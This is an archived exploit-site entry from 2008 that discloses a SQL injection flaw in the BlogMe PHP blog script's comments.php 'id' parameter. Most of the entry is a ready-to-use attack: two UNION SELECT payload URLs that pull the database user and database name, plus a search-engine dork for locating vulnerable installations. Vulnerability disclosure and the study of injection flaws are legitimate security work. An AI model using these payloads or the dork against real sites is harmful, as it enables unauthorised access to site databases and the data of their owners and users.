[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BlogMe PHP (comments.php id) SQL Injection Vulnerability
# Published : 2008-05-03
# Author : His0k4
# Previous Title : Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit
# Next Title : Smartblog (index.php tid) Remote SQL Injection Vulnerability
###########################################
{+} BlogMe PHP remote SQL injection exploit
{+} Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
{+} Dork : "BlogMe PHP created by Gamma Scripts"
###########################################
{+} Exploit :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
OR :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
###########################################
# www.Syue.com [2008-05-03]